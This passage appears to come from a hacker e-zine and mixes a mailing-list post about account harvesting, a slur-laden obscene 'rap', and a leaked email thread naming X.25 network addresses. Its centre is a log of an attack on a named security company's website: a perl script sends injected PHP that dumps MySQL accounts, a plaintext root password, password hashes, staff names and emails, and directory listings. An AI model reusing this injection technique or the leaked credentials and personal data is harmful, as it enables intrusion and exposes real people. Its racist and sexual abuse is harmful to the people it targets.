the account my mother uses (anke@seifried.org, a very uncommon name to say the least), obviously harvested from somewhere (she doesn't have a web page though.....). This is a hell of a lot more likely to be effective then randomly blasting away at user accounts, and names can be harvested via google/etc, so the target won't know. I suspect longer term we'll see very intelligent account enumeration (troll google, etc.), which is worrying for larger sites that may not have good password policies/enforcement. Botnet activity of course is huge and only going to get worse (it's where the money is). Another interesting thing that happened to me was my website being spammed. I run a wiki (seifried.org/security/), was allowing anonymous edits (not anymore), someone edited one of the help pages (out of the way) to have links to various pharma spam sites, then a while later according to the logs google rolled through, then the (scary part here) spammer went through and cleaned up the changes. No way I would have noticed this if I didn't actually read the change logs. So using my google page rank of 5 or so (and who knows how many other sites) they have improved their google ranking considerably. Sadly I can't win that war (registering an account is trivial and adding that capability to the spam bot wouldn't be to hard). This will mean CAPTCHA (sp?) tests for all wiki edits and who knows what else. Attackers that clean up worry me because it indicates that they're smart and probably want to come back (don't make it so painful that the target fixes the problem). > Thanks! > > Jim Reavis -Kurt 11.txt -~-~-~ 0d4y iCER r4pz and "True Elitez" rap by iCER (#!blackhat @ efnet) yo nigga iCER in the house sittin in my crib wearin' my mom's blouse sometimes i smoke crack i wish i was black don't worry nigga i'll overflow yo stack cuz i'm elite az elite as they come all i do is hack which is why i'm a bum sittin with my laptop drinkin some rum now i know what u think hackin'z hard but not for me nigga i pull that 0day trigga sittin on eye-are-sea all day with my main man bx ill teach lamerz a lesson fuck them fuckz up with some mad password guessin login into sshd'z i tried to fuck my sister but she's a goddamn tease oh well homie, at least hackin'z a breeze some people steppin so i get to strcpy greppin sometimes it dont work so i go to bugtraq my hackin skillz dont lack 'cause i fuckin read phrack ratta tat tat there goes 0day gat my hackin skillz are like artillery im a maniac on your network fuckin around with your filesystemz u dont know where the bd'z lurk [chorus] i'll ice you i'll ice ur friendz nigga ill ice ur box i'm as slick as a fox my hackin skillz rox [/chorus] x 4 fuck with my crew and you'll be black and blue im hard as a rock my condom is a dirty sock ddos me, hell no ill put ur box on lock im all about sellin cool drugz cuz im hardcore bx is my blackhat homie we true blackhatz but we dont do illegal shit just chillin in eye-are-see thatz my crib fo sho i keep my shit on the low i'm iCER nigga i'll fuck you in the butt it feels real good just call me a gay slut and i wont give ur butt a cut last time i fucked i gave bx 6 stitches on his ass he liked it a lot and then we smoked some pot you think your game for the big iCER? i'll own your ass unless you be a little nicer!@! some say im like big gay al lisp and all my ass will give you a growl now im a social engineer i got mad tekneeqz last time i took a shower was two fuckin weeks and now my ass fuckin reaks #!blackhat is the place to show ur hackin grace ill suck on bx tits and take two big shits we're true blackhats nobody can beat us not even pee-aych-sea cuz japboy cant crack our key so tell me what you wanna be ill hack you and let a virus free if anyone is leet itz me [chorus] x 5 12.txt -~-~-~ core-sdi b1t3z th31r t0ngu3. pl34s3 n0t3, w3 d0 n0t t4k3 subm1ss10nz. w3 f0und th1s f1l3 0n a l4rg3 sh3ll pr0v1d3r. (root@host)# ./listen -p9090 [w41t1ng..] [g0t c0nn3ct10n!] $ uname -a OpenBSD kenny.corelabs.core-sdi.com 3.3 GENERIC#1 i386 $ cat config.php | grep -v '//' $ ls -a . .. javascript pnadodb kb images docs language themes includes modules welcome mainfile.php modules.php pntables.php print.php referer.php robots.txt user.php admin.php xmlrpc.php backend.php banners.php config-old.php config.php error.php footer.php header.php index.php pntables.php.orig pntables.php.buchu modules.php.orig exploits welcome_old imps $ ls -a ../ . .. impact index.html oss impact_devel impact_new default $ ls -a ../../ . .. run var index.html cgi-bin conf htdocs icons logs users $ ls -a ../../conf/ . .. httpd.conf httpd.conf-dist magic mime.types php.ini httpd.conf.bak php.ini.bak $ ls -a ../../logs/ . .. error_log ssl_engine_log access_log etag-state httpd.pid ssl_scache.db oss-error_log oss-access_log default-error_log default-access_log access_log_comb oss-access_log_comb $ ls -a ../../cgi-bin/ . .. printenv test-cgi [c0nn3ct10n dr0pd] (root@host)# (root@host)# perl x2.pl http://support.coresecurity.com/impact/ "\$con=mysql_connect('127.0.0.1','root',' 73lh,x');mysql_select_db('mysql', \$con);\$res=mysql_query('select * from user', \$con) or die('whh');mysql_close(\$con);if(\ $res){echo('succ');while(\$row=mysql_fetch_assoc(\$res)){var_dump(\$row);echo('------');}}else{echo('failed');}" [*] Sending command $con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('mysql', $con);$res=mysql_query('select * from user', $con) or die('whh');mysql_close($con);if($res){echo('succ');while($row=mysql_fetch_assoc($res)){var_dump($row);echo('------');}}else{echo('failed');} [*] Command sent, waiting for response succarray(17) { ["Host"]=> string(1) "%" ["User"]=> string(4) "root" ["Password"]=> string(16) "198b1a3c66d30d36" ["Select_priv"]=> string(1) "Y" ["Insert_priv"]=> string(1) "Y" ["Update_priv"]=> string(1) "Y" ["Delete_priv"]=> string(1) "Y" ["Create_priv"]=> string(1) "Y" ["Drop_priv"]=> string(1) "Y" ["Reload_priv"]=> string(1) "Y" ["Shutdown_priv"]=> string(1) "Y" ["Process_priv"]=> string(1) "Y" ["File_priv"]=> string(1) "Y" ["Grant_priv"]=> string(1) "Y" ["References_priv"]=> string(1) "Y" ["Index_priv"]=> string(1) "Y" ["Alter_priv"]=> string(1) "Y" } ------array(17) { ["Host"]=> string(9) "localhost" ["User"]=> string(0) "" ["Password"]=> string(0) "" ["Select_priv"]=> string(1) "N" ["Insert_priv"]=> string(1) "N" ["Update_priv"]=> string(1) "N" ["Delete_priv"]=> string(1) "N" ["Create_priv"]=> string(1) "N" ["Drop_priv"]=> string(1) "N" ["Reload_priv"]=> string(1) "N" ["Shutdown_priv"]=> string(1) "N" ["Process_priv"]=> string(1) "N" ["File_priv"]=> string(1) "N" ["Grant_priv"]=> string(1) "N" ["References_priv"]=> string(1) "N" ["Index_priv"]=> string(1) "N" ["Alter_priv"]=> string(1) "N" } ------array(17) { ["Host"]=> string(5) "kenny" ["User"]=> string(0) "" ["Password"]=> string(0) "" ["Select_priv"]=> string(1) "N" ["Insert_priv"]=> string(1) "N" ["Update_priv"]=> string(1) "N" ["Delete_priv"]=> string(1) "N" ["Create_priv"]=> string(1) "N" ["Drop_priv"]=> string(1) "N" ["Reload_priv"]=> string(1) "N" ["Shutdown_priv"]=> string(1) "N" ["Process_priv"]=> string(1) "N" ["File_priv"]=> string(1) "N" ["Grant_priv"]=> string(1) "N" ["References_priv"]=> string(1) "N" ["Index_priv"]=> string(1) "N" ["Alter_priv"]=> string(1) "N" } ------array(17) { ["Host"]=> string(1) "%" ["User"]=> string(4) "paco" ["Password"]=> string(16) "184b39817e29f164" ["Select_priv"]=> string(1) "Y" ["Insert_priv"]=> string(1) "Y" ["Update_priv"]=> string(1) "Y" ["Delete_priv"]=> string(1) "N" ["Create_priv"]=> string(1) "N" ["Drop_priv"]=> string(1) "N" ["Reload_priv"]=> string(1) "N" ["Shutdown_priv"]=> string(1) "N" ["Process_priv"]=> string(1) "N" ["File_priv"]=> string(1) "N" ["Grant_priv"]=> string(1) "N" ["References_priv"]=> string(1) "N" ["Index_priv"]=> string(1) "N" ["Alter_priv"]=> string(1) "N" } ------(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "\$con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('Comunnity', \$con);\$res=mysql_query('show tables', \$con) or die('whh');mysql_close(\$con);if(\$re s){echo('succ');while(\$row=mysql_fetch_assoc(\$res)){var_dump(\$row);echo('------');}}else{echo('failed');}" [*] Sending command $con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('Comunnity', $con);$res=mysql_query('show tables', $con) or die('whh');mysql_close($con);if($res){echo('succ');while($row=mysql_fetch_assoc($res)){var_dump($row);echo('------');}}else{echo('failed');} [*] Command sent, waiting for response succarray(1) { ["Tables_in_Comunnity"]=> string(16) "impact_autolinks" } ------array(1) { ["Tables_in_Comunnity"]=> string(15) "impact_autonews" } ------array(1) { ["Tables_in_Comunnity"]=> string(13) "impact_banner" } ------array(1) { ["Tables_in_Comunnity"]=> string(19) "impact_bannerclient" } ------array(1) { ["Tables_in_Comunnity"]=> string(19) "impact_bannerfinish" } ------array(1) { ["Tables_in_Comunnity"]=> string(13) "impact_blocks" } ------array(1) { ["Tables_in_Comunnity"]=> string(21) "impact_blocks_buttons" } ------array(1) { ["Tables_in_Comunnity"]=> string(15) "impact_comments" } ------array(1) { ["Tables_in_Comunnity"]=> string(14) "impact_counter" } ------array(1) { ["Tables_in_Comunnity"]=> string(27) "impact_downloads_categories" } ------array(1) { ["Tables_in_Comunnity"]=> string(26) "impact_downloads_downloads" } ------array(1) { ["Tables_in_Comunnity"]=> string(27) "impact_downloads_editorials" } ------array(1) { ["Tables_in_Comunnity"]=> string(27) "impact_downloads_modrequest" } ------array(1) { ["Tables_in_Comunnity"]=> string(28) "impact_downloads_newdownload" } ------array(1) { ["Tables_in_Comunnity"]=> string(30) "impact_downloads_subcategories" } ------array(1) { ["Tables_in_Comunnity"]=> string(25) "impact_downloads_votedata" } ------array(1) { ["Tables_in_Comunnity"]=> string(12) "impact_ephem" } ------array(1) { ["Tables_in_Comunnity"]=> string(16) "impact_faqanswer" } ------array(1) { ["Tables_in_Comunnity"]=> string(20) "impact_faqcategories" } ------array(1) { ["Tables_in_Comunnity"]=> string(23) "impact_group_membership" } ------array(1) { ["Tables_in_Comunnity"]=> string(18) "impact_group_perms" } ------array(1) { ["Tables_in_Comunnity"]=> string(13) "impact_groups" } ------array(1) { ["Tables_in_Comunnity"]=> string(16) "impact_headlines" } ------array(1) { ["Tables_in_Comunnity"]=> string(12) "impact_hooks" } ------array(1) { ["Tables_in_Comunnity"]=> string(25) "impact_languages_constant" } ------array(1) { ["Tables_in_Comunnity"]=> string(21) "impact_languages_file" } ------array(1) { ["Tables_in_Comunnity"]=> string(28) "impact_languages_translation" } ------array(1) { ["Tables_in_Comunnity"]=> string(23) "impact_links_categories" } ------array(1) { ["Tables_in_Comunnity"]=> string(23) "impact_links_editorials" } ------array(1) { ["Tables_in_Comunnity"]=> string(18) "impact_links_links" } ------array(1) { ["Tables_in_Comunnity"]=> string(23) "impact_links_modrequest" } ------array(1) { ["Tables_in_Comunnity"]=> string(20) "impact_links_newlink" } ------array(1) { ["Tables_in_Comunnity"]=> string(21) "impact_links_votedata" } ------array(1) { ["Tables_in_Comunnity"]=> string(14) "impact_message" } ------array(1) { ["Tables_in_Comunnity"]=> string(18) "impact_module_vars" } ------array(1) { ["Tables_in_Comunnity"]=> string(14) "impact_modules" } ------array(1) { ["Tables_in_Comunnity"]=> string(17) "impact_poll_check" } ------array(1) { ["Tables_in_Comunnity"]=> string(16) "impact_poll_data" } ------array(1) { ["Tables_in_Comunnity"]=> string(16) "impact_poll_desc" } ------array(1) { ["Tables_in_Comunnity"]=> string(19) "impact_pollcomments" } ------array(1) { ["Tables_in_Comunnity"]=> string(16) "impact_priv_msgs" } ------array(1) { ["Tables_in_Comunnity"]=> string(12) "impact_queue" } ------array(1) { ["Tables_in_Comunnity"]=> string(13) "impact_quotes" } ------array(1) { ["Tables_in_Comunnity"]=> string(14) "impact_ratings" } ------array(1) { ["Tables_in_Comunnity"]=> string(17) "impact_ratingslog" } ------array(1) { ["Tables_in_Comunnity"]=> string(13) "impact_realms" } ------array(1) { ["Tables_in_Comunnity"]=> string(14) "impact_referer" } ------array(1) { ["Tables_in_Comunnity"]=> string(14) "impact_related" } ------array(1) { ["Tables_in_Comunnity"]=> string(14) "impact_reviews" } ------array(1) { ["Tables_in_Comunnity"]=> string(18) "impact_reviews_add" } ------array(1) { ["Tables_in_Comunnity"]=> string(23) "impact_reviews_comments" } ------array(1) { ["Tables_in_Comunnity"]=> string(19) "impact_reviews_main" } ------array(1) { ["Tables_in_Comunnity"]=> string(14) "impact_seccont" } ------array(1) { ["Tables_in_Comunnity"]=> string(17) "impact_seccontnew" } ------array(1) { ["Tables_in_Comunnity"]=> string(15) "impact_sections" } ------array(1) { ["Tables_in_Comunnity"]=> string(18) "impact_sectionsnew" } ------array(1) { ["Tables_in_Comunnity"]=> string(19) "impact_session_info" } ------array(1) { ["Tables_in_Comunnity"]=> string(17) "impact_stats_date" } ------array(1) { ["Tables_in_Comunnity"]=> string(17) "impact_stats_hour" } ------array(1) { ["Tables_in_Comunnity"]=> string(18) "impact_stats_month" } ------array(1) { ["Tables_in_Comunnity"]=> string(17) "impact_stats_week" } ------array(1) { ["Tables_in_Comunnity"]=> string(14) "impact_stories" } ------array(1) { ["Tables_in_Comunnity"]=> string(18) "impact_stories_cat" } ------array(1) { ["Tables_in_Comunnity"]=> string(13) "impact_topics" } ------array(1) { ["Tables_in_Comunnity"]=> string(16) "impact_user_data" } ------array(1) { ["Tables_in_Comunnity"]=> string(17) "impact_user_perms" } ------array(1) { ["Tables_in_Comunnity"]=> string(20) "impact_user_property" } ------array(1) { ["Tables_in_Comunnity"]=> string(17) "impact_userblocks" } ------array(1) { ["Tables_in_Comunnity"]=> string(12) "impact_users" } ------(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "\$con=mysql_connect('127.0.0.1','root',' 73lh,x');mysql_select_db('Comunnity', \$con);\$res=mysql_query('select * from impact_users', \$con) or die('whh');mysql_close (\$con);if(\$res){echo('succ');while(\$row=mysql_fetch_assoc(\$res)){var_dump(\$row);echo('------');}}else{echo('failed');}" [*] Sending command $con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('Comunnity', $con);$res=mysql_query('select * from impact_users', $con) or die('whh');mysql_close($con);if($res){echo('succ');while($row=mysql_fetch_assoc($res)){var_dump($row);echo('------');}}else{echo('failed');} [*] Command sent, waiting for response succarray(31) { ["pn_uid"]=> string(1) "1" ["pn_name"]=> string(0) "" ["pn_uname"]=> string(9) "Anonymous" ["pn_email"]=> string(0) "" ["pn_femail"]=> string(0) "" ["pn_url"]=> string(0) "" ["pn_user_avatar"]=> string(9) "blank.gif" ["pn_user_regdate"]=> string(10) "1058302436" ["pn_user_icq"]=> string(0) "" ["pn_user_occ"]=> string(0) "" ["pn_user_from"]=> string(0) "" ["pn_user_intrest"]=> string(0) "" ["pn_user_sig"]=> string(0) "" ["pn_user_viewemail"]=> string(1) "0" ["pn_user_theme"]=> string(1) "0" ["pn_user_aim"]=> string(0) "" ["pn_user_yim"]=> string(0) "" ["pn_user_msnm"]=> string(0) "" ["pn_pass"]=> string(0) "" ["pn_storynum"]=> string(2) "10" ["pn_umode"]=> string(0) "" ["pn_uorder"]=> string(1) "0" ["pn_thold"]=> string(1) "0" ["pn_noscore"]=> string(1) "0" ["pn_bio"]=> string(0) "" ["pn_ublockon"]=> string(1) "0" ["pn_ublock"]=> string(0) "" ["pn_theme"]=> string(0) "" ["pn_commentmax"]=> string(4) "4096" ["pn_counter"]=> string(1) "0" ["pn_timezone_offset"]=> string(4) "12.0" } ------array(31) { ["pn_uid"]=> string(1) "2" ["pn_name"]=> string(14) "Bruno Acselrad" ["pn_uname"]=> string(5) "buchu" ["pn_email"]=> string(22) "buchu@coresecurity.com" ["pn_femail"]=> string(0) "" ["pn_url"]=> string(27) "http://www.coresecurity.com" ["pn_user_avatar"]=> string(9) "blank.gif" ["pn_user_regdate"]=> string(10) "1058302436" ["pn_user_icq"]=> string(0) "" ["pn_user_occ"]=> string(0) "" ["pn_user_from"]=> string(0) "" ["pn_user_intrest"]=> string(0) "" ["pn_user_sig"]=> string(0) "" ["pn_user_viewemail"]=> string(1) "0" ["pn_user_theme"]=> string(1) "0" ["pn_user_aim"]=> string(0) "" ["pn_user_yim"]=> string(0) "" ["pn_user_msnm"]=> string(0) "" ["pn_pass"]=> string(32) "922ed3056a156d0c2a868ae91c735410" ["pn_storynum"]=> string(2) "10" ["pn_umode"]=> string(0) "" ["pn_uorder"]=> string(1) "0" ["pn_thold"]=> string(1) "0" ["pn_noscore"]=> string(1) "0" ["pn_bio"]=> string(0) "" ["pn_ublockon"]=> string(1) "0" ["pn_ublock"]=> string(0) "" ["pn_theme"]=> string(7) "Core-v1" ["pn_commentmax"]=> string(4) "4096" ["pn_counter"]=> string(1) "1" ["pn_timezone_offset"]=> string(4) "12.0" } ------array(31) { ["pn_uid"]=> string(1) "3" ["pn_name"]=> string(0) "" ["pn_uname"]=> string(4) "Test" ["pn_email"]=> string(16) "buchu@corest.com" ["pn_femail"]=> string(0) "" ["pn_url"]=> string(0) "" ["pn_user_avatar"]=> string(9) "blank.gif" ["pn_user_regdate"]=> string(10) "1059683345" ["pn_user_icq"]=> string(0) "" ["pn_user_occ"]=> string(0) "" ["pn_user_from"]=> string(0) "" ["pn_user_intrest"]=> string(0) "" ["pn_user_sig"]=> string(0) "" ["pn_user_viewemail"]=> string(1) "0" ["pn_user_theme"]=> NULL ["pn_user_aim"]=> string(0) "" ["pn_user_yim"]=> string(0) "" ["pn_user_msnm"]=> string(0) "" ["pn_pass"]=> string(32) "c6c7b5e75856d69c00449ad9153f541c" ["pn_storynum"]=> string(2) "10" ["pn_umode"]=> string(0) "" ["pn_uorder"]=> string(1) "0" ["pn_thold"]=> string(1) "0" ["pn_noscore"]=> string(1) "0" ["pn_bio"]=> string(0) "" ["pn_ublockon"]=> string(1) "0" ["pn_ublock"]=> string(0) "" ["pn_theme"]=> string(0) "" ["pn_commentmax"]=> string(4) "4096" ["pn_counter"]=> string(1) "0" ["pn_timezone_offset"]=> string(4) "12.0" } ------array(31) { ["pn_uid"]=> string(1) "4" ["pn_name"]=> string(10) "Alex Horan" ["pn_uname"]=> string(4) "alex" ["pn_email"]=> string(27) "alex.horan@coresecurity.com" ["pn_femail"]=> string(0) "" ["pn_url"]=> string(7) "http://" ["pn_user_avatar"]=> string(9) "blank.gif" ["pn_user_regdate"]=> string(10) "1078774842" ["pn_user_icq"]=> string(0) "" ["pn_user_occ"]=> string(0) "" ["pn_user_from"]=> string(0) "" ["pn_user_intrest"]=> string(0) "" ["pn_user_sig"]=> string(0) "" ["pn_user_viewemail"]=> string(1) "0" ["pn_user_theme"]=> NULL ["pn_user_aim"]=> string(0) "" ["pn_user_yim"]=> string(0) "" ["pn_user_msnm"]=> string(0) "" ["pn_pass"]=> string(32) "ea045a641ee701b44a2f0b04f4fb8b33" ["pn_storynum"]=> string(2) "10" ["pn_umode"]=> string(0) "" ["pn_uorder"]=> string(1) "0" ["pn_thold"]=> string(1) "0" ["pn_noscore"]=> string(1) "0" ["pn_bio"]=> string(0) "" ["pn_ublockon"]=> string(1) "0" ["pn_ublock"]=> string(0) "" ["pn_theme"]=> string(0) "" ["pn_commentmax"]=> string(4) "4096" ["pn_counter"]=> string(1) "0" ["pn_timezone_offset"]=> string(3) "7.0" } ------(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "\$con=mysql_connect('127.0.0.1','root',' 73lh,x');mysql_select_db('Community', \$con);\$res=mysql_query('select * from impact_users', \$con) or die('whh');mysql_close (\$con);if(\$res){echo('succ');while(\$row=mysql_fetch_assoc(\$res)){var_dump(\$row);echo('------');}}else{echo('failed');}" [*] Sending command $con=mysql_connect('127.0.0.1','root','73lh,x');mysql_select_db('Community', $con);$res=mysql_query('select * from impact_users', $con) or die('whh');mysql_close($con);if($res){echo('succ');while($row=mysql_fetch_assoc($res)){var_dump($row);echo('------');}}else{echo('failed');} [*] Command sent, waiting for response succarray(31) { ["pn_uid"]=> string(1) "1" ["pn_name"]=> string(0) "" ["pn_uname"]=> string(9) "Anonymous" ["pn_email"]=> string(0) "" ["pn_femail"]=> string(0) "" ["pn_url"]=> string(0) "" ["pn_user_avatar"]=> string(9) "blank.gif" ["pn_user_regdate"]=> string(10) "1058302436" ["pn_user_icq"]=> string(0) "" ["pn_user_occ"]=> string(0) "" ["pn_user_from"]=> string(0) "" ["pn_user_intrest"]=> string(0) "" ["pn_user_sig"]=> string(0) "" ["pn_user_viewemail"]=> string(1) "0" ["pn_user_theme"]=> string(1) "0" ["pn_user_aim"]=> string(0) "" ["pn_user_yim"]=> string(0) "" ["pn_user_msnm"]=> string(0) "" ["pn_pass"]=> string(0) "" ["pn_storynum"]=> string(2) "10" ["pn_umode"]=> string(0) "" ["pn_uorder"]=> string(1) "0" ["pn_thold"]=> string(1) "0" ["pn_noscore"]=> string(1) "0" ["pn_bio"]=> string(0) "" ["pn_ublockon"]=> string(1) "0" ["pn_ublock"]=> string(0) "" ["pn_theme"]=> string(0) "" ["pn_commentmax"]=> string(4) "4096" ["pn_counter"]=> string(1) "0" ["pn_timezone_offset"]=> string(4) "12.0" } ------array(31) { ["pn_uid"]=> string(1) "2" ["pn_name"]=> string(14) "Bruno Acselrad" ["pn_uname"]=> string(5) "buchu" ["pn_email"]=> string(22) "buchu@coresecurity.com" ["pn_femail"]=> string(0) "" ["pn_url"]=> string(27) "http://www.coresecurity.com" ["pn_user_avatar"]=> string(9) "blank.gif" ["pn_user_regdate"]=> string(10) "1058302436" ["pn_user_icq"]=> string(0) "" ["pn_user_occ"]=> string(0) "" ["pn_user_from"]=> string(0) "" ["pn_user_intrest"]=> string(0) "" ["pn_user_sig"]=> string(0) "" ["pn_user_viewemail"]=> string(1) "0" ["pn_user_theme"]=> string(1) "0" ["pn_user_aim"]=> string(0) "" ["pn_user_yim"]=> string(0) "" ["pn_user_msnm"]=> string(0) "" ["pn_pass"]=> string(32) "922ed3056a156d0c2a868ae91c735410" ["pn_storynum"]=> string(2) "10" ["pn_umode"]=> string(0) "" ["pn_uorder"]=> string(1) "0" ["pn_thold"]=> string(1) "0" ["pn_noscore"]=> string(1) "0" ["pn_bio"]=> string(0) "" ["pn_ublockon"]=> string(1) "0" ["pn_ublock"]=> string(0) "" ["pn_theme"]=> string(7) "Core-v1" ["pn_commentmax"]=> string(4) "4096" ["pn_counter"]=> string(1) "0" ["pn_timezone_offset"]=> string(4) "12.0" } ------array(31) { ["pn_uid"]=> string(1) "3" ["pn_name"]=> string(0) "" ["pn_uname"]=> string(4) "Test" ["pn_email"]=> string(16) "buchu@corest.com" ["pn_femail"]=> string(0) "" ["pn_url"]=> string(0) "" ["pn_user_avatar"]=> string(9) "blank.gif" ["pn_user_regdate"]=> string(10) "1059683345" ["pn_user_icq"]=> string(0) "" ["pn_user_occ"]=> string(0) "" ["pn_user_from"]=> string(0) "" ["pn_user_intrest"]=> string(0) "" ["pn_user_sig"]=> string(0) "" ["pn_user_viewemail"]=> string(1) "0" ["pn_user_theme"]=> NULL ["pn_user_aim"]=> string(0) "" ["pn_user_yim"]=> string(0) "" ["pn_user_msnm"]=> string(0) "" ["pn_pass"]=> string(32) "c6c7b5e75856d69c00449ad9153f541c" ["pn_storynum"]=> string(2) "10" ["pn_umode"]=> string(0) "" ["pn_uorder"]=> string(1) "0" ["pn_thold"]=> string(1) "0" ["pn_noscore"]=> string(1) "0" ["pn_bio"]=> string(0) "" ["pn_ublockon"]=> string(1) "0" ["pn_ublock"]=> string(0) "" ["pn_theme"]=> string(0) "" ["pn_commentmax"]=> string(4) "4096" ["pn_counter"]=> string(1) "0" ["pn_timezone_offset"]=> string(4) "12.0" } (root@host)# perl x2.pl http://support.coresecurity.com/impact/ "echo getcwd();" [*] Sending command echo getcwd(); [*] Command sent, waiting for response /htdocs/impact (root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../../var')){while((fa lse!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);" [*] Sending command if($dir=opendir('../../var')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir); [*] Command sent, waiting for response .---..---run---log--- (root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../../var/run')){while ((false!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);" [*] Sending command if($dir=opendir('../../var/run')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir); [*] Command sent, waiting for response .---..---mysql--- (root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../../run')){while((fa lse!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);" [*] Sending command if($dir=opendir('../../run')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir); [*] Command sent, waiting for response .---..---mysql--- (root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../')){while((false!== (\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);" [*] Sending command if($dir=opendir('../')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir); [*] Command sent, waiting for response .---..---impact---index.html---oss---impact_devel---impact_new---default--- (root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../oss/')){while((fals e!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);" [*] Sending command if($dir=opendir('../oss/')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir); [*] Command sent, waiting for response .---..---index.html---pcapy---repo---impacket---inlineegg---msyslog---images---projects---index.bk.html---(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../oss/impacket/')){w hile((false!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);" [*] Sending command if($dir=opendir('../oss/impacket/')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir); [*] Command sent, waiting for response .---..---LICENSE---ping.py---sniff.py---sniffer.py---split.py---tracer.py---rpcdump.py---samrdump.py---(root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../oss/impacket/LICENS E')){while((false!==(\$file=readdir(\$dir)))){echo(\$file.'---');}}closedir(\$dir);" [*] Sending command if($dir=opendir('../oss/impacket/LICENSE')){while((false!==($file=readdir($dir)))){echo($file.'---');}}closedir($dir); [*] Command sent, waiting for response (root@host)# perl x2.pl http://support.coresecurity.com/impact/ "readfile('../impact_devel/config.php');" [*] Sending command readfile('../impact_devel/config.php'); [*] Command sent, waiting for response (root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../impact_new/')){while((false!==(\$file=readdir(\$dir)))){if(is_writable('../impact_new/'.\$file)){echo(\$file.'-y--');}else{echo(\$file.'---');}} }closedir(\$dir);" [*] Sending command if($dir=opendir('../impact_new/')){while((false!==($file=readdir($dir)))){if(is_writable('../impact_new/'.$file)){echo($file.'-y--');}else{echo($file.'---');}}}closedir($dir); [*] Command sent, waiting for response .---..--- (root@host)# perl x2.pl http://support.coresecurity.com/impact/ "if(\$dir=opendir('../default/')){while((false!==(\$file=readdir(\$dir)))){if(is_writable('../default/'.\$file)){echo(\$file.'-y--');}else{echo(\$file.'---');}}}close dir(\$dir);" [*] Sending command if($dir=opendir('../default/')){while((false!==($file=readdir($dir)))){if(is_writable('../default/'.$file)){echo($file.'-y--');}else{echo($file.'---');}}}closedir($dir); [*] Command sent, waiting for response .---..---index.html--- w0w, th4tz 3mb4r4zz1ng. 13.txt -~-~-~ 1f b4b0 c4nt h4q th3m... 3y3 gu3zz w3 muzt! l3tz r0ll th0z3 gm41lz... gui nmap Aftermath to lordcamel Hide options 12/7/04 From: Aftermath Mailed-By: gmail.com Reply-To: Aftermath To: lordcamel@gmail.com Date: Dec 7, 2004 3:20 PM Subject: gui nmap asdf guinmap.rar 34K Download -~-~-~-~-~-~ c4m3l n33dz th3 p0w3r 0f th3 gu1 -~-~-~-~-~-~ el8 wishlist Inbox Aftermath to cripto, jbl Hide options 5/9/05 From: Aftermath Mailed-By: gmail.com Reply-To: Aftermath To: cripto@subterrain.net, jbl@subterrain.net Date: May 9, 2005 4:40 PM Subject: el8 wishlist Hi. I read your wishlist from a few years ago in el8 ish one. I have info on a few of the items you requested, spicificly the x25 info. The info I have is on the canadian datapac system mail me back if you are interested Reply Reply to all Forward Justin Lundy to me More options 5/9/05 sure pgp it and send it over ;-) - Show quoted text - On 5/9/05, Aftermath wrote: > Hi. I read your wishlist from a few years ago in el8 ish one. > > I have info on a few of the items you requested, spicificly the x25 > info. The info I have is on the canadian datapac system > > mail me back if you are interested > Reply Forward Aftermath to Justin More options 5/9/05 - Show quoted text - On 5/9/05, Justin Lundy wrote: > sure pgp it and send it over ;-) > > On 5/9/05, Aftermath wrote: > > Hi. I read your wishlist from a few years ago in el8 ish one. > > > > I have info on a few of the items you requested, spicificly the x25 > > info. The info I have is on the canadian datapac system > > > > mail me back if you are interested > > > this is going to sound really gay, but pgp wont install on the computers I use. I use collage computers and on re-set all installed shit gets wiped. Its really gay. But do you trust hushmail or some other way to encrypt? Reply Forward Justin Lundy to me More options 5/9/05 go ahead and send it over without encryption its no biggie - Show quoted text - On 5/9/05, Aftermath wrote: > On 5/9/05, Justin Lundy wrote: > > sure pgp it and send it over ;-) > > > > On 5/9/05, Aftermath wrote: > > > Hi. I read your wishlist from a few years ago in el8 ish one. > > > > > > I have info on a few of the items you requested, spicificly the x25 > > > info. The info I have is on the canadian datapac system > > > > > > mail me back if you are interested > > > > > > > this is going to sound really gay, but pgp wont install on the > computers I use. I use collage computers and on re-set all installed > shit gets wiped. Its really gay. > > But do you trust hushmail or some other way to encrypt? > Reply Forward Aftermath to Justin More options 5/11/05 Alright, here's the cooler ones i've stumbled upon: 20200131 Solstice X.29 Terminal Service Administrator @ (613) 785-0443 big "keep out" intro banner 2520 0080 <- asks for username and password (in french as well) 4280 0483 <- RAPIDNET services. Something to do with cars or something? links to other computers that need usernames/passwords. 4370 0356 <- Pyramid Technology Data Center OSx 4270 0119 <- asks for a password (just a password). Too many bad tries and it locks you out for a minute (must be something important!) 8340 1372 <- one fucked up system. Sends back random characters slowly Hey I have a question. What is that ADM software that you talked about? Is that some sort of x25 brute forcing software? - Show quoted text - -~-~-~-~-~-~ jbl c0mm1tz cr1m3z c4uz3 H3 1Z 4 CR1M1N4L! -~-~-~-~-~-~ trade Aftermath to mark.aben Hide options 6/18/05 From: Aftermath Mailed-By: gmail.com Reply-To: 